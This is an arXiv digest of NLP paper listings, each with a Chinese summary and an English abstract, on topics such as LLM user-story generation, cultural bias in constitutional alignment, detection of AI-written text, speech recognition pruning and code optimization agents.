[NLP-24] From Reviews to Requirements: Can LLM s Generate Human-Like User Stories?
【速读】: 该论文旨在解决从非结构化、非正式的移动应用商店评论中自动提取高质量用户故事(User Stories)以支持敏捷开发的需求。当前手动分析海量评论效率低下,而现有自动化方法在可复现性和输出质量上表现不佳,难以直接用于构建清晰的软件需求待办事项列表(backlog)。解决方案的关键在于利用大语言模型(Large Language Models, LLMs),特别是GPT-3.5 Turbo、Gemini 2.0 Flash和Mistral 7B Instruct,在零样本(zero-shot)、单样本(one-shot)和两样本(two-shot)提示策略下生成符合敏捷实践要求的用户故事,并通过RUST框架的人工评估与基于UStAI数据集微调的RoBERTa分类器进行质量验证。结果表明,LLMs在流畅性和格式规范性上可媲美甚至超越人类标注者,尤其在少样本提示场景下效果显著,但其在生成独立且独特用户故事方面仍存在局限,这限制了其对敏捷待办事项清单的直接贡献能力。
链接: https://arxiv.org/abs/2603.28163
作者: Shadman Sakib,Oishy Fatema Akhand,Tasnia Tasneem,Shohel Ahmed
机构: Islamic University of Technology (伊斯兰大学科技学院)
类目: Computation and Language (cs.CL)
备注:
Abstract:App store reviews provide a constant flow of real user feedback that can help improve software requirements. However, these reviews are often messy, informal, and difficult to analyze manually at scale. Although automated techniques exist, many do not perform well when replicated and often fail to produce clean, backlog-ready user stories for agile projects. In this study, we evaluate how well large language models (LLMs) such as GPT-3.5 Turbo, Gemini 2.0 Flash, and Mistral 7B Instruct can generate usable user stories directly from raw app reviews. Using the Mini-BAR dataset of 1,000+ health app reviews, we tested zero-shot, one-shot, and two-shot prompting methods. We evaluated the generated user stories using both human judgment (via the RUST framework) and a RoBERTa classifier fine-tuned on UStAI to assess their overall quality. Our results show that LLMs can match or even outperform humans in writing fluent, well-formatted user stories, especially when few-shot prompts are used. However, they still struggle to produce independent and unique user stories, which are essential for building a strong agile backlog. Overall, our findings show how LLMs can reliably turn unstructured app reviews into actionable software requirements, providing developers with clear guidance to turn user feedback into meaningful improvements.
[NLP-25] Does Claude's Constitution Have a Culture?
【速读】: 该论文旨在解决生成式 AI(Generative AI)在采用宪法式对齐(Constitutional AI, CAI)方法时可能引入的文化偏见问题,即当宪法由特定文化群体制定且训练数据主要来自同一文化背景时,模型是否会固化并放大此类偏见。其解决方案的关键在于通过跨文化评估实证检验CAI模型的价值倾向是否具有普遍性,发现Anthropic的Claude模型在多数价值维度上更贴近北欧及英语国家的价值观,并超出所有调查国的范围;此外,即便用户提供文化上下文,模型也仅调整修辞框架而不改变实质价值立场,表明当前CAI机制难以突破由训练数据和系统提示所设定的文化价值“地板”。
链接: https://arxiv.org/abs/2603.28123
作者: Parham Pourdavood
机构: Anthropic(Anthropic)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 20 pages, 6 figures
Abstract:Constitutional AI (CAI) aligns language models with explicitly stated normative principles, offering a transparent alternative to implicit alignment through human feedback alone. However, because constitutions are authored by specific groups of people, the resulting models may reflect particular cultural perspectives. We investigate this question by evaluating Anthropic’s Claude Sonnet on 55 World Values Survey items, selected for high cross-cultural variance across six value domains and administered as both direct survey questions and naturalistic advice-seeking scenarios. Comparing Claude’s responses to country-level data from 90 nations, we find that Claude’s value profile most closely resembles those of Northern European and Anglophone countries, but on a majority of items extends beyond the range of all surveyed populations. When users provide cultural context, Claude adjusts its rhetorical framing but not its substantive value positions, with effect sizes indistinguishable from zero across all twelve tested countries. An ablation removing the system prompt increases refusals but does not alter the values expressed when responses are given, and replication on a smaller model (Claude Haiku) confirms the same cultural profile across model sizes. These findings suggest that when a constitution is authored within the same cultural tradition that dominates the training data, constitutional alignment may codify existing cultural biases rather than correct them–producing a value floor that surface-level interventions cannot meaningfully shift. We discuss the compounding nature of this risk and the need for globally representative constitution-authoring processes.
[NLP-26] MOSS-VoiceGenerator: Create Realistic Voices with Natural Language Descriptions
【速读】: 该论文旨在解决现有文本到语音(Text-to-Speech, TTS)模型在生成可控语音时缺乏真实人类语音的“生活质感”(lived-in qualities)的问题,即当前模型多基于精心录制的录音室数据训练,导致输出语音虽清晰规范但缺乏自然情感与个性特征。解决方案的关键在于提出 MOSS-VoiceGenerator——一个开源的指令驱动语音生成模型,其核心创新是利用来自电影内容的大规模表达性语音数据进行训练,从而增强模型对自然语言提示的响应能力与语音自然度,实验证明该方法在整体表现、指令遵循能力和语音自然性方面均优于现有语音设计模型。
链接: https://arxiv.org/abs/2603.28086
作者: Kexin Huang,Liwei Fan,Botian Jiang,Yaozhou Jiang,Qian Tu,Jie Zhu,Yuqian Zhang,Yiwei Zhao,Chenchen Yang,Zhaoye Fei,Shimin Li,Xiaogui Yang,Qinyuan Cheng,Xipeng Qiu
机构: SII-OpenMOSS Team*
类目: Sound (cs.SD); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:Voice design from natural language aims to generate speaker timbres directly from free-form textual descriptions, allowing users to create voices tailored to specific roles, personalities, and emotions. Such controllable voice creation benefits a wide range of downstream applications, including storytelling, game dubbing, role-play agents, and conversational assistants, making it a significant task for modern Text-to-Speech models. However, existing models are largely trained on carefully recorded studio data, which produces speech that is clean and well-articulated, yet lacks the lived-in qualities of real human voices. To address these limitations, we present MOSS-VoiceGenerator, an open-source instruction-driven voice generation model that creates new timbres directly from natural language prompts. Motivated by the hypothesis that exposure to real-world acoustic variation produces more perceptually natural voices, we train on large-scale expressive speech data sourced from cinematic content. Subjective preference studies demonstrate its superiority in overall performance, instruction-following, and naturalness compared to other voice design models.
[NLP-27] Who Wrote the Book? Detecting and Attributing LLM Ghostwriters
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)生成文本的作者归属问题,即如何准确识别长篇文本(每本书超过5万词)的生成者,尤其是在分布外(out-of-distribution, OOD)场景下,如不同领域或未见过的LLM作者。解决方案的关键在于提出了一种名为TRACE的新颖指纹方法,该方法具有可解释性和轻量化特性,适用于开源与闭源模型。TRACE通过另一轻量级语言模型捕捉词元级别的转移模式(如词频排名),从而构建文本指纹,在GhostWriteBench数据集上的实验表明其在OOD设置中表现优异,且在训练数据有限的情况下仍具备强鲁棒性。
链接: https://arxiv.org/abs/2603.28054
作者: Anudeex Shetty,Qiongkai Xu,Olga Ohrimenko,Jey Han Lau
机构: The University of Melbourne (墨尔本大学); Macquarie University (麦考瑞大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:In this paper, we introduce GhostWriteBench, a dataset for LLM authorship attribution. It comprises long-form texts (50K+ words per book) generated by frontier LLMs, and is designed to test generalisation across multiple out-of-distribution (OOD) dimensions, including domain and unseen LLM author. We also propose TRACE – a novel fingerprinting method that is interpretable and lightweight – that works for both open- and closed-source models. TRACE creates the fingerprint by capturing token-level transition patterns (e.g., word rank) estimated by another lightweight language model. Experiments on GhostWriteBench demonstrate that TRACE achieves state-of-the-art performance, remains robust in OOD settings, and works well in limited training data scenarios.
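TRACE 的核心是用轻量级语言模型估计每个词元的排名,再把排名的转移模式汇总为指纹。下面是一个假设性的简化示意(分桶边界、指纹的余弦相似度匹配均为本文假设,并非论文原始实现):

```python
import numpy as np

def rank_bucket(rank, edges=(10, 100, 1000)):
    """把词元在轻量级语言模型下的排名映射到离散桶:
    [0,10), [10,100), [100,1000), [1000,∞)"""
    for b, e in enumerate(edges):
        if rank < e:
            return b
    return len(edges)

def trace_fingerprint(ranks, n_buckets=4):
    """假设性示意:统计相邻词元排名桶之间的转移频率,
    展平并归一化为指纹向量(长度 n_buckets**2)。"""
    M = np.zeros((n_buckets, n_buckets))
    for r1, r2 in zip(ranks, ranks[1:]):
        M[rank_bucket(r1), rank_bucket(r2)] += 1
    v = M.flatten()
    return v / max(v.sum(), 1)

def cosine(u, v):
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v) + 1e-12))
```

归属时可为每个候选 LLM 作者的已知文本各建一个指纹,再对待测书籍的指纹做最近邻(余弦)匹配。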
[NLP-28] Transfer Learning for an Endangered Slavic Variety: Dependency Parsing in Pomak Across Contact-Shaped Dialects LREC26
【速读】: 该论文旨在解决濒危语言Pomak(一种东南斯拉夫语方言)的依存句法分析(Dependency Parsing)问题,特别是针对土耳其语变体与希腊语变体之间因语音和形态句法差异导致的跨方言迁移性能下降的问题。其解决方案的关键在于:首先通过零样本迁移实验量化不同方言间的性能损失;其次构建了一个包含650句的土耳其语变体手动标注语料库,并证明小规模数据上的针对性微调可显著提升模型准确性;最后引入跨方言迁移学习策略,融合两种方言数据进行联合训练,进一步优化整体性能。
链接: https://arxiv.org/abs/2603.28033
作者: Sercan Karakaş
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted to DialRes-LREC26 (Workshop on Dialects in NLP A Resource Perspective)
Abstract:This paper presents new resources and baselines for Dependency Parsing in Pomak, an endangered Eastern South Slavic language with substantial dialectal variation and no widely adopted standard. We focus on the variety spoken in Turkey (Uzunköprü) and ask how well a dependency parser trained on the existing Pomak Universal Dependencies treebank, which was built primarily from the variety that is spoken in Greece, transfers across dialects. We run two experimental phases. First, we train a parser on the Greek-variety UD data and evaluate zero-shot transfer to Turkish-variety Pomak, quantifying the impact of phonological and morphosyntactic differences. Second, we introduce a new manually annotated Turkish-variety Pomak corpus of 650 sentences and show that, despite its small size, targeted fine-tuning substantially improves accuracy; performance is further boosted by cross-variety transfer learning that combines the two dialects.
[NLP-29] Rethinking Atomic Decomposition for LLM Judges: A Prompt-Controlled Study of Reference-Grounded QA Evaluation
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在基于参考文本的判别任务中,原子分解式(atomic decomposition)提示方法是否真正优于整体式(holistic)提示方法的问题。现有做法通常将候选答案拆解为若干命题进行逐条验证,但这种设计可能因提示更丰富而带来性能提升,而非分解本身的有效性。论文的关键解决方案是构建一个自分解原子判官(self-decomposing atomic judge)与一个提示控制的整体判官(prompt-controlled holistic judge),两者使用相同的输入和详细评分标准,在TruthfulQA、ASQA和QAMPARI三个问答类基准上进行严格对比实验。结果表明,整体判官在两个基准(ASQA和QAMPARI)上表现不逊于甚至优于原子判官,尤其在识别部分支持(partially_supported)情形下优势明显,说明其核心价值在于对不完整性(incompleteness)的敏感性,而非提示复杂度带来的收益。
链接: https://arxiv.org/abs/2603.28005
作者: Xinran Zhang
机构: University of California, Berkeley (加州大学伯克利分校)
类目: Computation and Language (cs.CL)
备注:
Abstract:Atomic decomposition – breaking a candidate answer into claims before verifying each against a reference – is a widely adopted design for LLM-based reference-grounded judges. However, atomic prompts are typically richer and longer, making it unclear whether any advantage comes from decomposition or from richer prompting. We study this for benchmark-style completeness-sensitive reference-support classification: classifying a candidate as fully supported, partially supported, or unsupported relative to a supplied reference. We compare a self-decomposing atomic judge (single-prompt decompose-and-verify) against a prompt-controlled holistic judge with the same inputs and a similarly detailed rubric. On 200 source examples per dataset across TruthfulQA, ASQA, and QAMPARI, with four model families, source-level paired tests, cluster bootstrap, and aggregation across three pre-frozen prompt variants per design family, we find the holistic judge matches or exceeds the atomic judge on two of three benchmarks: ASQA and QAMPARI favor holistic across all four families (statistically reliable in three of four), while TruthfulQA shows a small atomic edge. The holistic advantage is concentrated in partially_supported cases – incompleteness detection. A sensitivity check against human annotations confirms the ranking under both benchmark-completeness and human factual-correctness standards. Our finding is specific to the self-decomposing single-prompt pattern on three QA-style benchmarks with 200 source examples each; multi-stage atomic pipelines and non-QA tasks remain untested. Among perturbations examined, reference-quality degradation produced the largest accuracy drops for both judge families.
[NLP-30] CDH-Bench: A Commonsense-Driven Hallucination Benchmark for Evaluating Visual Fidelity in Vision-Language Models
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在面对视觉证据与常识冲突时的可靠性问题,即模型是否会优先遵循实际观察到的视觉信息,还是倾向于依赖先验常识进行推理。研究发现,即使先进VLMs也普遍存在“常识驱动型幻觉”(commonsense-driven hallucination, CDH)现象,即模型会忽略视觉证据而输出符合常识的答案。为系统评估此问题,作者提出CDH-Bench基准,通过设计三类明确的视觉-常识冲突场景(计数异常、关系异常和属性异常),并引入多项量化指标(如反事实准确率CF-Acc、常识准确率CS-Acc、常识崩溃率CCR等),实现了对模型视觉保真度的可控诊断。解决方案的关键在于构建具有结构化冲突设计的基准测试体系,并通过多维指标揭示模型对先验知识的依赖程度,从而识别其在真实场景中可能产生的偏差行为。
链接: https://arxiv.org/abs/2603.27982
作者: Kesheng Chen,Yamin Hu,Qi Zhou,Zhenqian Zhu,Wenjian Luo
机构: Harbin Institute of Technology, Shenzhen (哈尔滨工业大学深圳校区)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:Vision-language models (VLMs) achieve strong performance on many benchmarks, yet a basic reliability question remains underexplored: when visual evidence conflicts with commonsense, do models follow what is shown or what commonsense suggests? A characteristic failure in this setting is that the model overrides visual evidence and outputs the commonsense alternative. We term this phenomenon commonsense-driven hallucination (CDH). To evaluate it, we introduce CDH-Bench, a benchmark designed to create explicit visual evidence–commonsense conflicts. CDH-Bench covers three dimensions: counting anomalies, relational anomalies, and attribute anomalies. We evaluate frontier VLMs under binary Question Answering (QA) and multiple-choice QA, and report metrics including Counterfactual Accuracy (CF-Acc), Commonsense Accuracy (CS-Acc), Counterfactual Accuracy Drop (CFAD), Commonsense Collapse Rate (CCR), and Relative Prior Dependency (RPD). Results show that even strong models remain vulnerable to prior-driven normalization under visual evidence–commonsense conflict. CDH-Bench provides a controlled diagnostic of visual fidelity under visual evidence–commonsense conflict.
[NLP-31] On the Role of Encoder Depth: Pruning Whisper and LoRA Fine-Tuning in SLAM-ASR LREC2026
【速读】: 该论文旨在解决在SLAM-ASR(Speech-Language-Alignment Model for Automatic Speech Recognition)系统中,如何通过模型压缩(具体为层剪枝)在保持识别性能的同时降低计算成本的问题。其核心挑战在于:尽管已有研究探索了Whisper完整编码器-解码器架构的剪枝方法,但在以Whisper作为声学骨干网络的端到端ASR框架下,剪枝对系统性能的影响尚未充分理解。解决方案的关键在于:首先对Whisper编码器进行两层剪枝,在不显著牺牲识别精度(仅导致2–4% WER上升)的前提下减少参数量(7–14%);其次引入LoRA(Low-Rank Adaptation)微调机制来补偿剪枝带来的性能损失,实验表明该策略在多语言场景下可稳定提升性能,尤其在高资源语言(如英语、荷兰语)中通过利用语言模型(Language Model, LM)的先验知识有效减少词错误率(下降11–21%),但对低资源语言(如丹麦语)效果有限,且可能引入更多插入错误,揭示出LoRA补偿能力与预训练语言模型的语言掌握程度及训练数据丰富度密切相关。
链接: https://arxiv.org/abs/2603.27981
作者: Ganesh Pavan Kartikeya Bharadwaj Kolluri,Michael Kampouridis,Ravi Shekhar
机构: 未知
类目: Computation and Language (cs.CL); Sound (cs.SD)
备注: Accepted at SPEAKABLE Workshop, LREC 2026
Abstract:Automatic speech recognition (ASR) has advanced rapidly in recent years, driven by large-scale pretrained models and end-to-end architectures such as SLAM-ASR. A key component of SLAM-ASR systems is the Whisper speech encoder, which provides robust acoustic representations. While model pruning has been explored for the full Whisper encoder-decoder architecture, its impact within the SLAM-ASR setting remains under-investigated. In this work, we analyze the effects of layer pruning in the Whisper encoder when used as the acoustic backbone of SLAM-ASR. We further examine the extent to which LoRA-based fine-tuning can recover performance degradation caused by pruning. Experiments conducted across three Whisper variants (Small, Medium, Large-v2), three languages representing distinct resource levels (Danish, Dutch, English), and over 200 training runs demonstrate that pruning two encoder layers causes only 2-4% WER degradation, and that combining this pruning with LoRA adaptation consistently outperforms the unpruned baseline while reducing total parameters by 7-14%. Moreover, our error analysis reveals that LoRA primarily compensates through the language model’s linguistic priors, reducing total word errors by 11-21% for Dutch and English, with substitutions and deletions showing the largest reductions. However, for low-resource Danish, the reduction is smaller (4-7%), and LoRA introduces increased insertion errors, indicating that compensation effectiveness depends on the LLM’s pre-existing language proficiency and available training data.
[NLP-32] Efficient Inference of Large Vision Language Models
【速读】: 该论文旨在解决大型视觉语言模型(Large Vision Language Models, LVLMs)在推理阶段因计算资源需求庞大而导致的可扩展性与部署难题,尤其是高分辨率输入数据产生的大量视觉标记(visual tokens)加剧了注意力机制的二次复杂度问题。其解决方案的关键在于系统性地归纳和分析当前最先进的优化框架,并提出一个四维分类体系:视觉标记压缩、内存管理与服务策略、高效架构设计以及先进解码策略,从而为提升LVLM推理效率提供结构化指导并揭示未来研究方向。
链接: https://arxiv.org/abs/2603.27960
作者: Surendra Pathak
机构: 未知
类目: Machine Learning (cs.LG); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages
Abstract:Although Large Vision Language Models (LVLMs) have demonstrated impressive multimodal reasoning capabilities, their scalability and deployment are constrained by massive computational requirements. In particular, the massive amount of visual tokens from high-resolution input data aggravates the situation due to the quadratic complexity of attention mechanisms. To address these issues, the research community has developed several optimization frameworks. This paper presents a comprehensive survey of the current state-of-the-art techniques for accelerating LVLM inference. We introduce a systematic taxonomy that categorizes existing optimization frameworks into four primary dimensions: visual token compression, memory management and serving, efficient architectural design, and advanced decoding strategies. Furthermore, we critically examine the limitations of these current methodologies and identify critical open problems to inspire future research directions in efficient multimodal systems.
[NLP-33] EnsemJudge: Enhancing Reliability in Chinese LLM -Generated Text Detection through Diverse Model Ensembles NLPCC2025
【速读】: 该论文旨在解决中文生成式 AI (Generative AI) 文本检测的鲁棒性与准确性问题,尤其是在面对域外输入(out-of-domain inputs)或对抗样本(adversarial samples)时,现有方法性能下降显著,且多数研究集中于英文文本,缺乏对中文场景的有效支持。解决方案的关键在于提出 EnsemJudge 框架,该框架融合了针对中文文本特性的定制化策略与集成投票机制(ensemble voting mechanism),通过在 NLPCC2025 共享任务1提供的高质量中文数据集上训练与评估,实现了优于所有基线方法的检测性能,并获得第一名,验证了其在中文语境下检测生成文本的有效性与可靠性。
链接: https://arxiv.org/abs/2603.27949
作者: Zhuoshang Wang,Yubing Ren,Guoyu Zhao,Xiaowei Zhu,Hao Li,Yanan Cao
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted by NLPCC 2025 Shared Tasks
Abstract:Large Language Models (LLMs) are widely applied across various domains due to their powerful text generation capabilities. While LLM-generated texts often resemble human-written ones, their misuse can lead to significant societal risks. Detecting such texts is an essential technique for mitigating LLM misuse, and many detection methods have shown promising results across different datasets. However, real-world scenarios often involve out-of-domain inputs or adversarial samples, which can affect the performance of detection methods to varying degrees. Furthermore, most existing research has focused on English texts, with limited work addressing Chinese text detection. In this study, we propose EnsemJudge, a robust framework for detecting Chinese LLM-generated text by incorporating tailored strategies and ensemble voting mechanisms. We trained and evaluated our system on a carefully constructed Chinese dataset provided by NLPCC2025 Shared Task 1. Our approach outperformed all baseline methods and achieved first place in the task, demonstrating its effectiveness and reliability in Chinese LLM-generated text detection. Our code is available at this https URL.
[NLP-34] Top-down string-to-dependency Neural Machine Translation
【速读】: 该论文旨在解决神经网络机器翻译(Neural Machine Translation, NMT)模型在处理长输入序列时性能下降的问题,尤其是在训练数据中未见或罕见的长句翻译任务中表现不佳。其解决方案的关键在于提出一种新颖的自顶向下、从左到右的句法解码机制(syntactic decoder),该机制以生成目标语言依存树(dependency tree)的方式替代传统的序列到序列(sequence-to-sequence)解码方式,从而提升模型对长输入文本的泛化能力。实验表明,这种基于语法结构的解码策略在未见过的长句翻译任务中显著优于传统方法。
链接: https://arxiv.org/abs/2603.27938
作者: Shuhei Kondo,Katsuhito Sudoh,Yuji Matsumoto
机构: RIKEN Center for Advanced Intelligence Project (理化学研究所先进智能项目中心); Nara Women’s University (奈良女子大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Most of modern neural machine translation (NMT) models are based on an encoder-decoder framework with an attention mechanism. While they perform well on standard datasets, they can have trouble in translation of long inputs that are rare or unseen during training. Incorporating target syntax is one approach to dealing with such length-related problems. We propose a novel syntactic decoder that generates a target-language dependency tree in a top-down, left-to-right order. Experiments show that the proposed top-down string-to-tree decoding generalizes better than conventional sequence-to-sequence decoding in translating long inputs that are not observed in the training data.
[NLP-35] Article and Comment Frames Shape the Quality of Online Comments
【速读】: 该论文试图解决的问题是:新闻文章的表述方式(即“框架”)是否会影响读者评论的质量,尤其是评论的健康程度(constructive, good-faith contributions)。此前研究已表明框架会影响评论内容,但未深入探讨其对质量的影响。论文通过分析2700篇新闻文章下的100万条评论,发现文章框架显著预测评论健康度,且采用与文章相同框架的评论更健康;此外,不健康的顶层评论会引发更多不健康的回复,这一现象独立于文章框架。解决方案的关键在于识别出“框架一致性”与评论健康之间的因果关联,并基于此构建了一个主动式的、基于大语言模型(LLM)的框架感知系统,用于缓解不良言论传播,从而将 framing theory 与在线话语质量建立实证联系并推动应用落地。
链接: https://arxiv.org/abs/2603.27889
作者: Matteo Guida,Yulia Otmakhova,Eduard Hovy,Lea Frermann
机构: The University of Melbourne (墨尔本大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Framing theory posits that how information is presented shapes audience responses, but computational work has largely ignored audience reactions. While recent work showed that article framing systematically shapes the content of reader responses, this paper asks: Does framing also affect response quality? Analyzing 1M comments across 2.7K news articles, we operationalize quality as comment health (constructive, good-faith contributions). We find that article frames significantly predict comment health while controlling for topic, and that comments that adopt the article frame are healthier than those that depart from it. Further, unhealthy top-level comments tend to generate more unhealthy responses, independent of the frame being used in the comment. Our results establish a link between framing theory and discourse quality, laying the groundwork for downstream applications. We illustrate this potential with a proactive frame-aware LLM-based system to mitigate unhealthy discourse.
[NLP-36] HumMusQA: A Human-written Music Understanding QA Benchmark Dataset
【速读】: 该论文旨在解决当前大型音频语言模型(Large Audio-Language Models, LALMs)在音乐理解能力评估中缺乏严谨基准测试的问题,即现有数据方法往往无法真实检验模型是否具备对音乐的感知与解释能力。其解决方案的关键在于提出一种精心设计的音乐评估方法,构建了一个由320个专家手工编写并验证的问答数据集,强调通过专业人员的深度参与和人工标注来更有效地探测复杂音频理解能力,从而弥补自动采集或通用数据集在音乐语义建模上的不足。
链接: https://arxiv.org/abs/2603.27877
作者: Benno Weck,Pablo Puentes,Andrea Poltronieri,Satyajeet Prabhu,Dmitry Bogdanov
机构: Universitat Pompeu Fabra (庞培法布拉大学); Universitat Autònoma de Barcelona (巴塞罗那自治大学)
类目: Computation and Language (cs.CL); Sound (cs.SD)
备注: Dataset available at this https URL
Abstract:The evaluation of music understanding in Large Audio-Language Models (LALMs) requires a rigorously defined benchmark that truly tests whether models can perceive and interpret music, a standard that current data methodologies frequently fail to meet. This paper introduces a meticulously structured approach to music evaluation, proposing a new dataset of 320 hand-written questions curated and validated by experts with musical training, arguing that such focused, manual curation is superior for probing complex audio comprehension. To demonstrate the use of the dataset, we benchmark six state-of-the-art LALMs and additionally test their robustness to uni-modal shortcuts.
[NLP-37] KazByte: Adapting Qwen models to Kazakh via Byte-level Adapter
【Quick Read】: This paper tackles the problem that tokenizers built for high-resource languages fragment low-resource languages such as Kazakh into far more tokens, which inflates compute, shrinks the effective context window, and weakens the model's grasp of Kazakh morphology. The key to the solution is to bypass conventional tokenization entirely: raw bytes are fed into a small adapter that learns to interface with the internal representations of a frozen Qwen2.5-7B model; once the adapter is trained, only the attention layers of the Qwen model are fine-tuned on Kazakh text, enabling efficient and accurate language modeling. The central hypothesis of this two-stage strategy is that first establishing the interface and then adapting the model can match or exceed the original Qwen2.5-7B on standard Kazakh benchmarks.
Link: https://arxiv.org/abs/2603.27859
Authors: Rauan Akylzhanov
Affiliations: Independent Researcher
Subjects: Computation and Language (cs.CL); Numerical Analysis (math.NA)
Comments: Technical announcement
Abstract:Large language models fragment Kazakh text into many more tokens than equivalent English text, because their tokenizers were built for high-resource languages. This tokenizer tax inflates compute, shortens the effective context window, and weakens the model’s grip on Kazakh morphology. We propose to bypass the tokenizer entirely by feeding raw bytes through a small adapter that learns to speak the internal language of a frozen Qwen2.5-7B. Once the adapter is trained, we freeze it and fine-tune only the attention layers of Qwen on Kazakh text. Our central hypothesis is that this two-stage process – first teach the interface, then adapt the model – should match or exceed the accuracy of the original Qwen2.5-7B on standard Kazakh benchmarks. This report describes the ByteKaz architecture and training protocol. Empirical validation is ongoing; this version stakes the design and hypotheses for the record.
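The "tokenizer tax" described above disappears at the input layer when text is consumed as raw UTF-8 bytes: the vocabulary is a fixed 256 ids for every language, at the cost of longer sequences for non-Latin scripts. A minimal sketch of the byte-level input (illustrative only; the paper's actual adapter architecture is not shown here):

```python
def byte_sequence(text: str) -> list[int]:
    """Tokenizer-free input ids: one id per UTF-8 byte (0-255).
    Cyrillic Kazakh letters occupy two bytes each, so sequences grow,
    but no language-specific vocabulary is needed."""
    return list(text.encode("utf-8"))
```

For example, `byte_sequence("сәлем")` yields 10 ids for 5 Kazakh characters, whereas `byte_sequence("hello")` yields 5; in the paper's design these byte ids would feed the small adapter placed in front of the frozen model.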
[NLP-38] What can LLMs tell us about the mechanisms behind polarity illusions in humans? Experiments across model scales and training steps
【Quick Read】: This paper investigates the mechanisms behind polarity illusions in language models, focusing on two classic cases, the NPI illusion and the depth charge illusion, and how they differ across model scales. The study finds that the NPI illusion weakens and ultimately disappears as model size increases, whereas the depth charge illusion grows stronger; this suggests that LLMs may not rely on "rational inference" mechanisms that repair ill-formed sentences, but instead operate via shallow, good-enough processing or partial grammaticalization of prescriptively ungrammatical structures. The key contribution is a theoretical synthesis rooted in the principles of construction grammar that explains how LLMs can exhibit human-like semantic-syntactic illusions without explicit logical reasoning.
Link: https://arxiv.org/abs/2603.27855
Authors: Dario Paape
Affiliations: University of Potsdam
Subjects: Computation and Language (cs.CL)
Comments:
Abstract:I use the Pythia scaling suite (Biderman et al. 2023) to investigate if and how two well-known polarity illusions, the NPI illusion and the depth charge illusion, arise in LLMs. The NPI illusion becomes weaker and ultimately disappears as model size increases, while the depth charge illusion becomes stronger in larger models. The results have implications for human sentence processing: it may not be necessary to assume “rational inference” mechanisms that convert ill-formed sentences into well-formed ones to explain polarity illusions, given that LLMs cannot plausibly engage in this kind of reasoning, especially at the implicit level of next-token prediction. On the other hand, shallow, “good enough” processing and/or partial grammaticalization of prescriptively ungrammatical structures may both occur in LLMs. I propose a synthesis of different theoretical accounts that is rooted in the basic tenets of construction grammar.
[NLP-39] EffiSkill: Agent Skill Based Automated Code Efficiency Optimization
【Quick Read】: This paper addresses how to harness large language models (LLMs) to optimize code efficiency: existing approaches such as one-shot rewriting, retrieved exemplars, or prompt-based search fail to distill reusable optimization knowledge, which limits generalization to unseen programs. The key to the solution is the EffiSkill framework, which models recurring slow-to-fast code transformations as reusable agent skills that explicitly capture both concrete transformation mechanisms and higher-level optimization strategies, forming a portable optimization toolbox. The framework adopts a two-stage design: Stage I mines Operator Skills and Meta Skills from large-scale slow/fast program pairs to build a skill library; Stage II optimizes unseen programs without runtime feedback through execution-free diagnosis, skill retrieval, plan composition, and candidate generation, substantially improving optimization success rates.
Link: https://arxiv.org/abs/2603.27850
Authors: Zimu Wang,Yuling Shi,Mengfan Li,Zijun Liu,Jie M. Zhang,Chengcheng Wan,Xiaodong Gu
Affiliations: Shanghai Jiao Tong University; University of California, Berkeley; Columbia University; King’s College London; East China Normal University; Shanghai Innovation Institute
Subjects: Software Engineering (cs.SE); Computation and Language (cs.CL)
Comments:
Abstract:Code efficiency is a fundamental aspect of software quality, yet how to harness large language models (LLMs) to optimize programs remains challenging. Prior approaches have sought for one-shot rewriting, retrieved exemplars, or prompt-based search, but they do not explicitly distill reusable optimization knowledge, which limits generalization beyond individual instances. In this paper, we present EffiSkill, a framework for code-efficiency optimization that builds a portable optimization toolbox for LLM-based agents. The key idea is to model recurring slow-to-fast transformations as reusable agent skills that capture both concrete transformation mechanisms and higher-level optimization strategies. EffiSkill adopts a two-stage design: Stage I mines Operator and Meta Skills from large-scale slow/fast program pairs to build a skill library; Stage II applies this library to unseen programs through execution-free diagnosis, skill retrieval, plan composition, and candidate generation, without runtime feedback. Results on EffiBench-X show that EffiSkill achieves higher optimization success rates, improving over the strongest baseline by 3.69 to 12.52 percentage points across model and language settings. These findings suggest that mechanism-level skill reuse provides a useful foundation for execution-free code optimization, and that the resulting skill library can serve as a reusable resource for broader agent workflows.
[NLP-40] Model Capability Dominates: Inference-Time Optimization Lessons from AIMO 3
【Quick Read】: This paper addresses the problem that correlated errors across multiple LLM attempts limit the effectiveness of majority voting in mathematical reasoning by shrinking the effective sample size. The proposed fix is a "Diverse Prompt Mixer" that assigns structurally different reasoning strategies to different voters to decorrelate their errors. The experiments, however, show that high-temperature sampling already decorrelates errors sufficiently, that weaker prompt strategies reduce per-attempt accuracy more than they reduce correlation, and that across every tested intervention, model capability dominates by an order of magnitude over any other inference-time optimization.
Link: https://arxiv.org/abs/2603.27844
Authors: Natapong Nitarach
Affiliations: Unknown
Subjects: Computation and Language (cs.CL)
Comments:
Abstract:Majority voting over multiple LLM attempts improves mathematical reasoning, but correlated errors limit the effective sample size. A natural fix: assign structurally different reasoning strategies to different voters to decorrelate errors. We test this Diverse Prompt Mixer in the AIMO 3 competition: 3 models, 23+ experiments, and 50 IMO-level problems on a single H100 80 GB with a 5-hour limit. Every intervention fails. High-temperature sampling already decorrelates errors sufficiently; weaker prompt strategies reduce per-attempt accuracy more than they reduce correlation. Across a 17-point model capability gap and every inference-time optimization we tried, model capability dominates by an order of magnitude.
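The effective-sample-size intuition in the abstract can be sketched in a few lines: plain majority voting over sampled answers, plus the standard design-effect formula for how a pairwise error correlation rho shrinks the effective number of independent voters (the formula is a textbook illustration, not necessarily the paper's exact analysis):

```python
from collections import Counter

def majority_vote(answers):
    """Most common answer across attempts; ties break by first occurrence,
    since Counter.most_common preserves insertion order for equal counts."""
    return Counter(answers).most_common(1)[0][0]

def effective_sample_size(n, rho):
    """Design-effect estimate of the number of effectively independent
    voters when every pair of attempts has error correlation rho."""
    return n / (1 + (n - 1) * rho)
```

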